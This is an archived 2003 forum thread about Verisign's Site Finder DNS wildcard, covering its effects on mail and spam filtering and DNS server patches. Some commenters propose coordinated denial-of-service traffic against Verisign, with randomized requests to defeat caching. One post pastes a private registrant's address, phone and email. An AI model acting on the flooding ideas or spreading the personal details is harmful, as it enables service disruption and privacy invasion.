I've worked for professional politicians. The web/e-mail opinion is irrelevant. If you want to be counted (not heard, mind you) send a letter or a fax.

Re:On-line petitions don't work

[RevMike]

The web/e-mail opinion is irrelevant. If you want to be counted (not heard, mind you) send a letter or a fax.

I've actually heard that this has changed. Apparently in the post-Anthrax congress, they would prefer you didn't send a letter. Email and fax are now listened to much more closely.

Re:On-line petitions don't work

[Eric+Ass+Raymond]

Yeah, I heard it too.

Now I hear it's back to the old routine. Fax is OK, but if you want to make sure your stance gets counted (again not heard, mind you), send a letter. Preferably hand-written.

E-mails and web-petitions carry absolutely no political weight.

Re:On-line petitions don't work

[EdMack]

Actually (not that your wrong) after the big scary terrorists, American polititions have to pay attention to email, and letters take a lot longer because of security

Everyone say Thank you terrorists

Re:On-line petitions don't work

[AmigaAvenger]

You are HALF right... They prefer you didn't send a letter, the other half about email and fax not being ignored hasn't changed...

Re:On-line petitions don't work

[mummers]

Whether it 'works' or not, this type of protest can only assist in bringing pressure upon Verisign.

Doing something, in this case, is at least better than doing nothing. This petition does not prevent those who wish to patch, block, fax, email, phone or otherwise engage Verisign from doing so.

If you want to, and have the time, you can do all of the above :)

Re:On-line petitions don't work

[Trickster+Coyote]

In other words, politicians won't take anything serioiusly until someone goes out and kills a bunch of trees to make their point.

----
Ideology is for ideots.

Monetary damages

[jesterzog]

What sort of monetary damages is this action by Verisign incurring for people and businesses everywhere?

Verisign's action was most probably intended for web traffic, where it's at least an annoyance. But since the DNS is an independent system from the web that's used by all sorts of services, it's undoubtedly breaking all sorts of non-web things out there that rely on knowing accurately if a domain name exists... not to mention all of the additional maintenance time. Email and spam filters are the two that seem to've been brought up a lot.

So far I've seen a lot of people getting mad and I am too, but I haven't seen anyone actually state how much they're losing due to the sudden change and breaking of standards by Verisign. Is anyone confident to put an amount on this?

Re:Monetary damages

[leviramsey]

I wonder how many port 25 connections Verisign is getting, thanks to all the spam armored domain names (e.g. slashdotNOSPAM.org)...

Re:Monetary damages

[gothicpoet]

I have yet to hear anyone who can say IAL or even much of anyone who is NAL comment on any legal culpability Verisign might face in this regard.

I'm surprised by that since normally EVERYONE has a legal opinion...

(Somebody just pretend that this was SCO or Microsoft that did this for a minute -- that should generate some legal opinions...)

Re:Monetary damages

[Phroggy]

whoa, holy crap, I hadn't even thought of that.

My SMTP server is set to reject mail when the "from" envelope sender doesn't resolve. This prevents spammers from using completely non-existent envelope senders. Since all unregistered .com/net domains now resolve, this restriction is no longer significant.

I've heard a few antispam proposals that involves adding new DNS records to indicate what IP addresses are allowed to send mail from a certain envelope sender domain. Since obviously not everyone has these new records set up, you'd accept anything from anyone who doesn't, and only reject mail if the domain DOES have the new records AND they don't match the IP the connection is coming from. Not a bad idea, but this breaks it.

Re:Monetary damages

[mino]

What sort of monetary damages is this action by Verisign incurring for people and businesses everywhere?

I've thrown together some astoundingly rough figures on my personal site. They're not much, but at least it's a number. Anyone who wishes to is welcome to make them more accurate.

I was very conservative in my figures, and came up with something like 2.2 million a day in lost productivity -- and that's not touching on bandwidth etc.

Re:Monetary damages

[leviramsey]

As has been noted, the RFC specifies that the A record is to be used if no MX is available.

Re:Canada

[XJEEP.org]

404 errors are generated by webservers. your browser would return a this page could not be found/resolved page before this was changed.

what am i missing here??

[wang33]

I tried the various examples in the previous comments, and my connection always times out never gets redirected like the exa,ple link in the story. Tried it in opera and IE.
Is this just something verisign is planning on implemeting or is it supposed to be in place already?

Re:what am i missing here??

[Meowing]

It seems to work maybe 1 in 5 times. They pretty clearly did some serious underestimation of the server resources they's need to pull off this kind of thing, so now they are effectively DOS'ing Web clients by holding them up while their server chikes.

Re:what am i missing here??

[gothicpoet]

Some major ISPs and probably many many smaller ones have already blocked this. As of last night I discovered that I was no longer getting the Sitefinder page when I entered a bad domain from home (Comcast cable modem) but would just get a blank page every time.

At the same time as I could not get the "sleaze-jacking" page to come up from home, I remoted to a system at my office and that system was able to get to the "sleaze-jacking" Sitefinder page every time.

Your mileage will vary -- and hopefully Verisign's mileage will shrink like a willy in cold water.

Is there any hope on the horizon that someone somewhere will b*tch-slap Verisign over this one?

(Anybody?)

Think about it.

[NaugaHunter]

Everybody go here. Go again.

Hear that? That's the sound of their redirection server being slashdotted. I wonder how much traffic they've calculated this would bring, and if they've thought it through.

(At least, I'm getting 'Cannot be displayed' errors. Whether that's because their getting flooded, or because they've already given up, or for some reason this and the example in the article aren't going through them.)

Re:Think about it.

[Tom7]

If you think their servers are going to suffer under a slashdotting if they are now accepting ALL mistyped/obsolete domain names, think again. The slashdot traffic will be totally insignificant.

How did this make it as a headline?

[dentar]

This is news? Good god. I wish we could mod whole stories down... ;-(

Can we sue?

[xchino]

Seriously, would it be possible for ISP's to file a class action suit? I have spent ALL day (so far) dealing with the repurcussions of this blatant misuse of authority. I know others out there are dealing with the same. I also had two customers get .ws websites rather than AVAILABLE .com sites because they use the method of putting the name in the browser and seeing if a site comes up. They figured verisign was squatting on the domain, and thought they would have to pay verisign for the use of the domain.

On a side note...

Our mail servers are filling up with spam, and with the recent loss of SPEWS, our spam filtering system is basically useless.. save for the few other blacklist sites still out there. Spammers must be rejoicing today.

Fuck you VeriSign, Fuck you very much.

Re:Can we sue?

[James_G]

If you use Postfix, a patch was just released to help out with this problem:

This is to announce an unofficial patch for Postfix 2.0 to black-list
domain names by their mail server (such as Verisign's mail server
for non-existent .com or .net domain names) or by their DNS servers.

The patch for Postfix 2.0 is based on code that was developed for
Postfix snapshot 20030917.

ftp://ftp.porcupine.org/mirrors/postfix-release/of ficial/postfix-2.0-ns-mx-acl-patch.gz

Below the signature is a description from the Postfix snapshot
20030917 release notes file.

Wietse

New check_{helo,sender,recipient}_{ns,mx}_access maptype:mapname
restriction that applies the specified access table to the NS or
MX hosts of the host/domain given in HELO, EHLO, MAIL FROM or RCPT
TO commands.

This can be used to block mail from so-called spammer havens, or
from sender addresses that resolve to Verisign's wild-card mail
responder, currently at IP address 64.94.110.11. /etc/postfix/main.cf:
smtpd_mumble_restrictions = ...
reject_unknown_sender_domain
check_sender_mx_access hash:/etc/postfix/mx_access ... /etc/postfix/mx_access:
spammer.haven.tld reject spammer mx host
64.94.110.11 reject verisign wild-card domain

Note: OK actions are not allowed for security reasons. Instead of
OK, use DUNNO in order to exclude specific hosts from blacklists.
If an OK result is found for an NS or MX host, Postfix rejects the
SMTP command with "451 Server configuration error".

Re:Can we sue?

[exi7]

I also had two customers get .ws websites rather than AVAILABLE .com sites because they use the method of putting the name in the browser and seeing if a site comes up. They figured verisign was squatting on the domain, and thought they would have to pay verisign for the use of the domain.

Perhaps you should educate your customers on proper methods instead. Just because a domain is not resolved does not mean it is available. Many situations in which this would be the case, as in a domain not being propagated or improper/missing pointing of the domain to the IP.

Maybe you should let them know of a tool that will allow them do do their research properly. It's called WHOIS.

Re:Can we sue?

[wfberg]

Maybe you should let them know of a tool that will allow them do do their research properly. It's called WHOIS.

Actually WHOIS is quite bad. Using dig is slightly better, but it's best to just try to register it (or query the SRS) - the shared registry system itself has the most up-to-date information, as it's the system that has direct access to the registry's database in order to, well, perform registrations and check availability.

Re:Can we sue?

[Agent+R]

I think people should be able to sue with this blatant violation of the RFCs. (Also how Verisign happily signs up spammer domains filled with false registration info.)

As for SPEWS. It is still there, but under a constant DDOS. (Probably from a bunch of spammer recently spanked.) But access is really spotty. You may want to try to use the SpamCop BL as an alternative until SPEWS is backonline reliably.

Re:Can we sue?

[Tony+Hoyle]

Also debian unstable now has the patched bind9 available. You have to upgrade bind9 and a couple of libiscc{mumble} files for it to work (the maintainer forgot to add the dependency in the rush to get it out...)

I've upgraded all the servers I have access to and the internet is behaving normally again :)

Re:Can we sue?

[Phroggy]

Perhaps you should educate your customers on proper methods instead.

How do you propose he do that before they call up and take his time? Mailbomb them? Redirect port 80 to a web page with questionaire, and don't let them back on the web until they answer all the questions correctly?

Welcome to the real world.

Re:Can we sue?

[Phroggy]

You may want to try to use the SpamCop BL as an alternative until SPEWS is backonline reliably.

Note that bl.spamcop.net is completely automated, based on complaints received; IPs are NOT verified by anyone at SpamCop before being added to the blacklist. For this reason, SpamCop asks that you not use their list to bounce mail! Use it to flag potential spam for review, not to reject messages blindly.

Re:Can we sue?

[criquet]

I plan to sue the very first time my DNS goes down and I lose email because VeriSign bounces it immediately rather than allowing for the standard mail delivery behavior. I pay for a backup services that VeriSign is circumventing.

I am also in the process of filing suit for violation of my privacy. Regardless of their privacy statement, I have no assurance that my accesses are protected. For example, VeriSign can now easily implement a password harvesting site that emulates, for example, Yahoo's login page, and many users will never notice they typo.

I make my living from the internet and VeriSign has just thrown my entire livelyhood into chaos. Until all the tools I use are patched to work around the problem, it is going to cost me a fortune to double and triple check my typing and work around them manually and I intend to get every penny back from VeriSign.

Re:Can we sue?

[Agent+R]

True, the site does say to use it for flagging purposes. (Then let the user decide.) Only thing is that what do the SPEWS users use in the meantime? My real mail provider uses the bl.spamcop.net to filter out spam. So far, haven't had a problem with false positives.

Re:Mail addresses (open letter to above addresses)

[Neophytus]

BCC: authenticode-support@verisign.com, billing@verisign.com,
channel-partners@verisign.com, clientpki@verisign.com,
consultingsolutions@verisign.com, dbms-support@verisign.com,
dcpolicy@verisign.com, digitalbranding@verisign.com,
dnssales@verisign.com, enterprise-pkisupport@verisign.com,
enterprise-sslsupport@verisign.com, info@verisign-grs.com,
internetsales@verisign.com, IR@verisign.com, jobs@verisign.com,
mss@verisign.com, objectsigning-support@verisign.com,
paymentsales@verisign.com, practices@verisign.com,
premiersupport@networksolutions.com, press@verisign.com,
privacy@networksolutions.com, renewal@verisign.com,
support@verisign.com, verisales@verisign.com, vps-support@verisign.com,
vts-csrgroup@verisign.com, vts-mktginfo@verisign.com,
webhelp@verisign.com, websitesales@verisign.com,
websitesupport@verisign.com
Message-ID: <3F68CBB9.2000103@(yay its not a .com).org>
Date: Wed, 17 Sep 2003 22:01:45 +0100
From: Andrew Bell <>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.5b) Gecko/20030827
X-Accept-Language: en, en-us
MIME-Version: 1.0
To: just me so that primitive spamblockers don't pick up on an empty To: line
CC: Spam tracking CC (gives them another address to harvest)
Subject: Verisign behaviour feedback
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Its clear that your 'site finder' initiative to break the internet with
profit has fallen flat on its face, with many large DNS services now
returning NXDOMAIN like they should. Have you got any official response
as to why you decided to go ahead against everyone's best interests?
Cybersquatting the entire internet like... isn't cool. Nor was sending
fake renewal notices.

I'm hoping that whoever reads this puts this to their superiors, or at
least has the courtesy to reply. Have a good day,
Andrew

So far I have had 4 O-O-O autoresponders and a thanks for submitting your resume.

The Forest Service doesn't see VeriSign errors

[drpentode]

I work for the U.S. Forest Service, and guess what? Our DNS servers don't redirect us to the VeriSign crap. We still get a good old-fashioned error message. Yippee!

Not that anyone should try this, but...

Not to give anyone any ideas, but wouldn't it be poetic justice if, say, all the unused phone numbers in the US were suddenly directed to Verisign's toll-free line.

Re:Not that anyone should try this, but...

[Rog7]

I actually called Verisign's head office about an hour ago and told them that I plan on making that very suggestion to my local phone company.

Terms of Service

[Tom7]

Well, this is finally working for me now!

Man, did you check out their "terms of service"? That shit is hilarious!

" 14. By using the service(s) provided by VeriSign under these Terms of Use, you acknowledge that you have read and agree to be bound by all terms and conditions here in and documents incorporated by reference."

HOW THE FUCK AM I SUPPOSED TO READ AND AGREE TO BE BOUND TO TERMS, when I arrived at the site by mis-typing a domain name????

From the privacy policy:

"Under no circumstances do we collect any personal data revealing racial or ethnic origin, political opinions, religious or philosophical beliefs, trade union membership, health, or sex life."

No? What about when I go to any political site, sex site, health site, religious site, etc, and don't type the domain name correctly?

http://www.sitefinderreallyreallysucks.com/

Re:Terms of Service

[Reziac]

I've also had the thought that they are probably collating data on common typoes, with intent to squat on those domains for later resale. I understand that some of the existing domain squatters do that by way of "is that domain available" query pages; why not Verisign? It would be well within their business ethics.

Yikes!

[shepd]

Closed source code that's this short?

God help us all!

99.99999999% of all domains now run Linux

Because sitefinder-idn.verisign.com runs Linux, and now 99.99999999% of all domains now point to it, almost 100% of the Internet is now running Linux!

To repeat the obvious...

...and preach to the choir.

Verisign was contracted to run DNS servers for the .com and .net top-level domains; both of which are in practice "flat" address spaces, with no formalised lower-level hierarchy. If an organisation registers the domain "foo.com", implements nameservers for this domain, and then these nameservers ignore accepted practice and the way the majority of Internet applications expect the nameservice to work - then the organisation shoots only itself in the foot.

Verisign is in effect treating the entire top-level .com and .net domains as its corporate property.

If Verisign were genuinely ignorant of the effects of their move, then the company is not competent to operate TLD DNS services. If Verisgn were aware of the potential problems their decision could cause and went ahead regardless for commercial reasons then the company is not fit to operate TLD DNS services.

If ICANN cannot react to this nonsense in less than a working week, ICANN itself is not fit to direct the Internet naming service.

Apart from massed armies of geeks with pitchforks and flaming torches converging on Verisign and ICANN locations, does anyone have any constructive suggestions on how to get the parasites out of the loop?

What will Verizon do?

[Bruha]

I think most people know how jealous Verizon is of it's name even in url's. I'm curious how they'll view someone who misstypes a verizon adress and is presented with ad's from their competitors.

ddos, anyone?

[tedtimmons]

So I've had a couple of ideas of how we could express our displeasure in this:

* a cron entry that runs every minute or two, and hits port 80 on verisign's webserver farm.

* infrequent ping- like 1 every 30 seconds

With enough people, this would becomre more than an annoyance. But I'm looking for better ideas. Anyone? Bueller?

Solution to this problem...

[galvanash]

Write a little script that hits http://www.verisignsuxhard.com every 30 seconds. If you pass this around to enough geeks, eventually we can have our trusty old error back...

Re:Solution to this problem...

[r00zky]

I would suggest using randomized data for the domains, so that they can't cache requests to their database.
And a delay lower than 1sec ;)

Fix how?

[Tom7]

Does anyone have any idea how an application (or even resolver) writer could workaround this?
All the solutions I've come up with can be defeated by having verisign rotate their IP addresses or domain (sitefinder.verisign.com) ...

What is BIND doing?

Re:Fix how?

They are releasing a patch in response to fix this slashdot.org

Re:Fix how?

[Tony+Hoyle]

It's fixed in debian unstable..
I guess Redhat,Mandrake, etc. will release the fix in the next day or so if they haven't already (it'd be nice if security.debian.org got it too for all the uber stable machines out there).

You can download the patch from the ISC website and compile yourself if you want, too.

Re:Fix how?

[Tom7]

I mean, how would one fix this at a programmatic level, not how do I apply patches that other people have written. Another way of asking would be: how do these patches solve the problem?

Re:Fix how?

[NilsK]

What is BIND doing?

Bind gets a configuration-option, disallowing specific zones to have anything else but delegation. You effectively can configure, that the .com. zone no longer is allowed to return A-records, but only NS-records.

Nevertheless Verisign can make a workaround: They intruduce a wildcard NS-Record and return A-records from that delegation. That is at least the idea somebody on a mailinglist mentioned, and it seems to make sense. I do not know wether this is possible by the standards (Anyone with more DNS-Knowledge available)?

Re:Fix how?

[Eponymous+Mallard]

The ISC has released a patch to BIND.
It is being discussed on the BIND mailing list.
Other server patches are listed here .
Verisign may be backing down .

The Eponymous Mallard
"If it quacks like a duck, it's the Eponymous Mallard."

For UK visitors

[slayer99]

Please help with keeping pressure on Verisign - instructions here.

Re:Canada

[Cecil]

Incorrect. Domain change propagation still takes up to 48 hours, even when it's Verisign doing it.

This change is on the root servers. They serve the .com/net/org subdomains, period. Whether you're in Canada or Antarctica, it doesn't matter. Some ISPs will have the new wildcard record, some will not. Give it a day or two, and everyone's caches will have expired and will have the latest info. Then you'll get to see it.

Wrote email to VeriSign

[SuperDry]

I wrote an email today to NetSol/VeriSign to voice my displeasure. As I have 5 or so domains up for renewal in October, along with various web and email hosting features that go along with them that are currently with NetSol. I told them that I would be moving everything to another registrar should they not have rescinded their change by my renewal date.

I know that my $300 a year may not be the end of the world to them, but I thought it important that they know that some people will make buying decisions based on this. And the types of people that handle DNS registration issues are just the types of people to be ticked off by this.

They sent me a form letter response, that addressed both this new unregistered DNS feature as well as the "register in advance for about-to-expire domains" feature that I didn't mention at all in my email. Their response to that issue was also defensive, so I take it that they're getting an earful on that one as well.

Re:Wrote email to VeriSign

[grozzie2]

Over the years, Network Solutions was always the 'premier' issuer of names for the .com and .net tld's. The rationale for most of corporate north america (and much of the rest of the world too) has always been, they operate the root servers, the root servers are ALWAYS there, and they ALWAYS work right. Why go elsewhere? Verisign on the other hand, was another company building a business on TRUST, ya, the big thing was TRUST, and most of the internet TRUSTS Verisign with a huge amount of financial data/transactions. If not the transaction itself, it's the Verisign infrastructure being TRUSTED to validate things. When the two companies merged thru buyout, it was actually a very logical (altho way out of reality priced) transaction.

Enter events of the last few days:-
a) The root servers do not work correctly today
b) The root servers do give out wrong data
c) Verisign is the instigator of this wrong data

Basically what's happened, an infrastructure based on a trust relationship has just been rendered 'not trustworthy'. There is an obvious first step that must be taken, and we have to remove Network Solutions / Verisign from the list of 'approved suppliers'. By definition, this means any services currently under subscription there, will move to another location.

The next trick is not gonna be quite as easy, but, it must be done. We will have to move thru our entire infrastructure and remove the Verisign top level certificates from all web browsers. yup, this is gonna break a LOT of https: stuff out there for our users, but, that's life. Suppliers that want to deal with us on a secure basis will have to find another source of top level certificates, and, dont forget, THAWTE certs are no good either now, that's another subsidiary of the beast.

I guess this was inevitable. Corporate USA is a slave to the dollar, not to the principle of doing business in an honorable way. Having the top level trust relationship in electronic system based on a trust relationship with an american corporation is a flawed fundamental concept. It's time to change that.

Re:Wrote email to VeriSign

[heff]

5 domains for $300 a year? you are getting ripped off dude.

a google search will reveal hundreds of registrars for less than 10 bucks a year/domain.

Re:Wrote email to VeriSign

[Hans+Lehmann]

The first thing I did yesterday morning was transfer the one domain I still had at NetworkSolutions to NameSecure. Why are you giving them the opportunity to change their mind? That's like catching a burglar with a sack of your possesions, and promising to let him go as long as he gives everything back. Versign has already committed a crime, as far as I'm concerned, and waiting for them to change their mind *after* they realize how much money they're losing won't make them better people. They need to be destroyed, now.

Re:Wrote email to VeriSign

[bradipo]

Transfer it regardless of what they do, you will feel much better afterwards. I have already transitioned over 30 domains from Verisign/Netsol to Dotster and will continue to register any new domains there as well. Much better service there and much more clueful.

Re:Wrote email to VeriSign

[SuperDry]

$300 is not just for domain registration, but also for various hosting services. I know I can get similar for less elsewhere - it's a matter of the effort required to convert.

Re:Wrote email to VeriSign

[heff]

makes sense, dont go with the cheap ass hosting - you get cheap ass service.

This is definitely not a Linux program

[melted]

If it were a Linux program it would be called kvtse or gvtse depending on whether it's for Gnome or KDE.

Send Email to the CEO of ICANN

[Nintendork]

Paul Twomey

-Lucas

I emailed verisign & friends earlier today

[BOOTSTRAPS]

here is the original message i sent:
Verisign has continually been abusing the power that has been handed out to them. Two such examples are its mailing of false renewal notices, and its most recent exploit: sitefinder.verisign.com. Now, nearly all mistyped names will be sent to Verisign where they can do whatever they like to the unwitting user. There are even categories on sitefinder.verisign.com where one can browse and go to sites which are undoubtedly paying Verisign for the space. Please take this, and the hundreds or thousands of e-mails you will receive, into consideration, and exercise the power that ICANN has. Verisign has continually been abusing and tricking people through deceptive business practices, and this should be the last straw. Verisign should not only be removed from it's post, but it should also be fined for its numerous escapades designed to make money. Sincerely, Jay Taylor

here are the replies so far:
enterprise-pkisupport@verisign.com
Site Finder Service
VeriSign's Site Finder service improves the web browsing experience when the user has submitted a query for a nonexistent second-level domain name in the .com and .net top-level domains. Before this service was implemented, when a user entered a URL containing a nonexistent (e.g., unregistered) domain name ending in .com or .net, their web browser returned an error message that contained no useful information. With the introduction of Site Finder, users now receive a helpful web page offering links to possible intended destinations, related categories, and the ability to conduct additional searches immediately. For more information, please email: sitefinder@verisign-grs.com

CustomerService@NetworkSolutions.com
Dear Mr. Taylor,
Thank you for contacting Network Solutions.
We apologize for the inconvenience you are experiencing.
Much to our regret, we may not be able to assist you with your concern, as what you are encountering is a system recently applied by the Global Registry.
Site Finder is a new service offered by the VeriSign Global Registry. For more information, please contact VeriSign at sitefinder@verisign-grs.com
Please know that your inquiry is important to us, and we value your business.
Best regards,
Edwin001 Network Solutions, Inc.

improves the web-browsing experience my ass...abuses a monopoly is more like it. oh ya, they forgot to mention how much extra revenue it would generate for them. sLeAzEy.
:( what has the world come to. sad.

also- here is the list of emails that i sent the msg to:
authenticode-support@verisign.com; billing@verisign.com; channel-partners@verisign.com; clientpki@verisign.com; consultingsolutions@verisign.com; dbms-support@verisign.com; dcpolicy@verisign.com; digitalbranding@verisign.com; dnssales@verisign.com; enterprise-pkisupport@verisign.com; enterprise-sslsupport@verisign.com; info@verisign-grs.com; internetsales@verisign.com; IR@verisign.com; jobs@verisign.com; mss@verisign.com; objectsigning-support@verisign.com; paymentsales@verisign.com; practices@verisign.com; premiersupport@networksolutions.com; press@verisign.com; privacy@networksolutions.com; renewal@verisign.com; support@verisign.com; verisales@verisign.com; vps-support@verisign.com; vts-csrgroup@verisign.com; vts-mktginfo@verisign.com; webhelp@verisign.com; websitesales@verisign.com; websitesupport@verisign.com

Email the CEO of Verisign!

[Nintendork]

Here's the email address of the bastard himself, Stratton Sclavos

-Lucas

Re:Canada

[Kunta+Kinte]

404 errors are generated by webservers. your browser would return a this page could not be found/resolved page before this was changed.

Right.

And when MS started replacing the web server's 404 error response page with IE's own error page that sent the user to MSN, I didn't hear anyone complain.

Ever noticed that you don't get the default Apache error page when using IE..., ever? IE only displays an error page if it's greater than a certian size. Webmasters have to play tricks like padding the error page with comments so that IE goes ahead and displays it.

To me they are both wrong, but MS has been doing that kind of thing for a while.

Re:How to make their marketing fools notice

[Xerithane]

Marketing fools don't read web server logs.

You have never actually worked at a company have you? You do realize that people make millions of dollars a year writing web server log analyzers and correlators for marketing research. Don't take my word for it though.

Single quotes are your friend. Anyone who types \& is a dumbass.

Really, how do you propose to pass a reference to a subroutine? Oh, you mean in shell syntax? Why do single quotes when you can just escape. Escaping is a pretty handy thing.

You're a dumbass.

You need some help, mate. Seriously. Get a cat or something.

There is still one domain that doesn't resolve.

[crucini]

verisignsucks.com

Is this the only .com left?

Re:There is still one domain that doesn't resolve.

[AnimeFreak]

[animefreak@tsunami:~]$ whois verisignsucks.com

Found a referral to whois.networksolutions.com.

NOTICE AND TERMS OF USE: You are not authorized to access or query our WHOIS
database through the use of high-volume, automated, electronic processes. The
Data in Network Solutions' WHOIS database is provided by Network Solutions for information
purposes only, and to assist persons in obtaining information about or related
to a domain name registration record. Network Solutions does not guarantee its accuracy.
By submitting a WHOIS query, you agree to abide by the following terms of use:
You agree that you may use this Data only for lawful purposes and that under no
circumstances will you use this Data to: (1) allow, enable, or otherwise support
the transmission of mass unsolicited, commercial advertising or solicitations
via e-mail, telephone, or facsimile; or (2) enable high volume, automated,
electronic processes that apply to Network Solutions (or its computer systems). The
compilation, repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of Network Solutions. You agree not to use
high-volume, automated, electronic processes to access or query the WHOIS
database. Network Solutions reserves the right to terminate your access to the WHOIS
database in its sole discretion, including without limitation, for excessive
querying of the WHOIS database or for failure to otherwise abide by this policy.
Network Solutions reserves the right to modify these terms at any time.

Registrant:
BERRY, DANIEL (VERISIGNSUCKS-DOM)
2466 Yarmouth Lane
Crofton, MD 21114
US

Domain Name: VERISIGNSUCKS.COM

Administrative Contact, Technical Contact:
BERRY, DANIEL (DXB1251) dberry64@comcast.net
2466 Yarmouth Lane
Crofton, MD 21114
US
4107219180 fax: 4107219295

Record expires on 19-Mar-2004.
Record created on 10-May-2002.
Database last updated on 17-Sep-2003 19:17:09 EDT.

Domain servers in listed order:

NS1.IUNIVERSE.CC
NS2.IUNIVERSE.CC

[animefreak@tsunami:~]$

Too bad it is owned. :(

Ultimate Spam List?

[ceije]

What's to keep Verisign or another TLD registrar from doing a wildcard like this in order to harvest the valid email addresses of everyone who accidentally makes a typo in a domain name?

They could compile a huge spam list that way. How would we know if they decided to do this?

Could they also harvest the content of your emails?

If they're willing to run an HTTP wildcard site, what might they be willing to do with SMTP?

Verisign should be stopped before they abuse their potential power. Just like Iraq. ;-)

Whadda'ya say, Dubya?

Lawsuit time?

[Erich]

I'm wondering if I should send a cease & desist order for verisign infringing on my web page (for instance) moobokmeow.com. If you go to either mobokmeow.com or moobockmeow.com , it delivers you to a verisign page. Surely this is infringing on the good name of moobokmeow.com!

Any lawyers out there want to send the C&D for me?

Re:Lawsuit time?

[WEFUNK]

If you go to either mobokmeow.com or moobockmeow.com , it delivers you to a verisign page.

And some might say that at least that Verisign site includes a link to your site (and only your site). That might be okay, right? I mean better than everyone who doesn't get the benefit of the redirect. Well, of course not.

While I'm generally in favour of letting sites freely link to any other site, this isn't just anybody putting your site on their webpage, this is a company you've paid money to (probably, directly or indirectly) that is pulling your name out of their database for a different commercial use without your permission. This is different from a search engine combing the net to create a published set of databases (even one that associate sites contextually or corrects typos) because this is a direct breach of trust with the very entity charged with protecting your information, and, at the very least, it's very bad business.

Surely this is infringing on the good name of moobokmeow.com!

There might be a legal trademark case, but I don't think there should be (unless this specifically breaches part of their contracts). While it's tempting to fight fire with fire, it would require a further abuse of IP laws of the kind that so many of us are against. Really, this is just a dumb business idea that should be stopped through market pressure -- hopefully they'll pull it either before or after they get some mainstream press picks up the angle and labels this as "typosquatting". If so, it could cause companies to start taking our opinions seriously.

ICANN, IAB, IETF official response

[MobyDisk]

Official response is here

Essentially, they state that this change violates the RFC for DNS for several reasons. They are creating an IETF working group to recommended practices for implementing DNS, above and beyond what the RFC requires. Unfortunately, there is no mention of any action, or even censure.

Re:ICANN, IAB, IETF official response

[zjbs14]

Check that date. It's ancient history and was a recommendation that Verisign not do what they just did.

We'll just have to wait and see if ICANN comes back and slaps them down

Re:ICANN, IAB, IETF official response

[skington]

Not only is that an old advisory, but it refers to Verisign's plans to implement wildcard DNS for internationalised domain names (IDN), which is an earlier evil.

Re:ICANN, IAB, IETF official response

[Morbid_Angel666]

Did anyone else notice this at the bottom of the site containing the messages?

"This page is maintained by the IAB Executive Director
Last modified 26 November, 2002."

Re:ICANN, IAB, IETF official response

[morelife]

Exactly.

The original thread of 2 days ago on the Verisign fiasco contained this iab link and information, emphasizing the January date. I posted last night pointing out yet again that this response/recommendation by IAB made in January was completely ignored. Now MobyDisk is pointing this out yet AGAIN in an effort to correct your erroneous 5-Informative. Attention moderators: you are often modding important correct information down and out of sight and unimportant stuff that sounds authoritative up - come on tighten it up guys!!! Not a criticism negatively please don't take it that way - I realize for moderators there's probably too much information to have to digest quickly.

However, the IAB response is the most coherent response on technical grounds yet presented - recognize any of the names on that panel??

Why is this bad?

[suwain_2]

Besides the obvious fact that VeriSign is making massive changes on a whim, why is this bad? There are a slew of reasons why I, too, object -- but they're all on principle (it violates the RFC, it's scary as hell that they can do this unchecked, etc.) -- I'm still yet to find something that is actually broken by this.

Can someone provide some concrete examples of problems this causes?

Re:Why is this bad?

[wasabii]

Spam filters could filter out "forged" email by verifying if the from address' domain actually resolved. Every address now resolves. Programs which check weither or not a web address is "up and working" can now be fooled into thinking it is up when it is not. There are hundreds of similar programs or software running in organizations that expect clear and consistant error information.

This bypasses my choice of search engine withing my browser for non existant domains (currently google).

Re:Why is this bad?

[zjbs14]

Here's a short list:

1. Breaks alternate MX handling if the top priority mailserver's domain is/becomes unregistered. Instead of using a secondary MX record, the mail will bounce or get queued (see #2).

2. Verisign has put a faulty SMTP listener on port 25 that attempts to send a 550 back to the mailer. But it relies on a certain sequence of commands entered and can cause mail to sit queued for days if that sequence isn't just what it expects.

3. Various DNS-based spam checks now ineffective.

4. People with misconfigured systems using non-registered .com and .net domains having problems with sendmail.

I know there's more, but it's a start.

Re:Why is this bad?

[mino]

Breaks alternate MX handling if the top priority mailserver's domain is/becomes unregistered.

There's a hypothetical privacy violation here. Even though the newly-enabled primary MX will not receive any actual email, it will still receive the MAIL FROM and RCPT TO. If you had a dodgy primary MX which has now been 'taken over' by Verisign, they might well be able to log that a message was sent to you from a certain email address.

Knowing that an email was sent from george.w@whitehouse.gov to anonymous.helpline@sexualdysfunction.org, just because of a formerly-non-working primary MX for sexualdysfunction.org, is in itself a privacy violation.

Re:Why is this bad?

[Muggins+the+Mad]

> Can someone provide some concrete examples of problems this causes?

Well for me, for example, when I mistype a URL, I no longer get an error message almost instantly. I have to wait several seconds (sometimes 10 to 30 - yay modems) to discover that I haven't actually reached the page I wanted.

A few times a day and this gets close to the amount of my time and resources that get wasted by spammers.

I also get ads thrust in my face, which I consider to be extremely rude and quite costly to myself.

Multiply that by the number of people this affects and you start to get costs up there with the costs of damage of viruses and spammers.

- Muggins the Mad

Simple solution..

[Si]

fleem@linux [~/dl] $ host fleemgoats.com
fleemgoats.com has address 64.94.110.11
fleem@linux [~/dl] $ host 64.94.110.11
11.110.94.64.in-addr.arpa domain name pointer sitefinder-idn.verisign.com.
...
root@smoothwall~# iptables -t filter -I OUTPUT -d 64.94.110.11 -j DROP
root@smoothwall~# iptables -t filter -I FORWARD -d 64.94.110.11 -j DROP

Re:Simple solution..

[AndyS]

Wouldn't REJECT be better? I thought DROP just dropped it on the floor and meant you'd suffer the wait for it to timeout.

Might not apply for output though - not configured iptables for ageeesss

Re:Simple solution..

[Si]

Yeah, you're right. I normally do a DROP on inbound traffic so those 1337 h4x0r5 don't get an icmp port-unreachable. REJECT would be better for outbound users.

Sitefinder link for the firewalled

[missing000]

Here

Patched Nameserver Database Available

[fo0bar]

Somewhat off-topic, but relevant to the whole Verisign DNS idiocy... I have thrown up a database of patched nameservers here (don't worry about arouse.net, it's not a porn site), which currently allows you to check to see if a nameserver has been patched to block return of 'A' results for non-existent domains, and allows you to add to the database if it is a patched server.

This is an odd redirect.

[willy134]

I can't believe how this thing will redirect a web page. You would think that a domain like slashdot.org would resolve correctly. But check this out...
Linky

Re:This is an odd redirect.

[PhreakinPenguin]

I get a different response:

http://sitefinder.verisign.com/lpc?url=microsoft su cks.com&host=slashdot.org

Re:This is an odd redirect.

[SpaceLifeForm]

I suspect Microsoft is behind this mess. I wouldn't surprise me in the least. Microsoft has the cash, and Verisign probably can use it.

Internet != web, fool

